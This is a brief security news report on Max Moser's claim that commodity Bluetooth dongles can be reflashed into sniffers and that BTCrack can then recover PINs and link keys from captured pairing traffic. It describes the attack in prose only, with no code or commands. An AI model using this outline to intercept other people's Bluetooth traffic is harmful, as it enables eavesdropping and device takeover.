Bluetooth sniffing for all
Security specialist Max Moser, whose credits include developing the BackTrack security distribution, claims to have found a way to transform a commercially available Bluetooth dongle into a Bluetooth sniffer. This would make it possible to read all packets from Bluetooth end points within range, not just those addressed to your own device. Similar to WLAN, this would affect Bluetooth security seriously, since the freely available tool BTCrack is able to work out the PIN and link key from a packet read during the pairing process. An attacker would then also have access to the end device.
Until now, such an attack would have required the use of a Bluetooth protocol analyser costing several thousand euros. WLAN had also been considered relatively secure until cards which used firmware supporting monitor mode and able to pass received packets to tools such as Airsnort and Kismet started to come onto the market.
A similar mode, RAW mode, is indeed supported by some more expensive Bluetooth dongles. However, this limitation is clearly imposed by the firmware, rather than the hardware. In analysing commercial software packages for Bluetooth sniffers, Moser noticed that the drivers were expecting sticks with a chip from Cambridge Silicon Radio. In addition, one package included firmware with which Moser was able to extend a normal stick to be able to use RAW mode. In tests using demo versions of commercial Bluetooth sniffing software he was able to read Bluetooth traffic. The only thing lacking for widespread use of Bluetooth sniffers is availability of a free Linux sniffer.
It's going to be interesting to see if others manage to convert low cost Bluetooth dongles into Bluetooth sniffers and what effect this is going to have on Bluetooth security. In the medium term, it can be expected that Bluetooth will increasingly become the hacker's technology of choice. Whether or not this year will see the first Bluedriving events, which are already common WLAN events, is unclear.
- Busting the Bluetooth Myth, report from Max Moser
- 23C3 - new hacker tools for Bluetooth, report on heise Security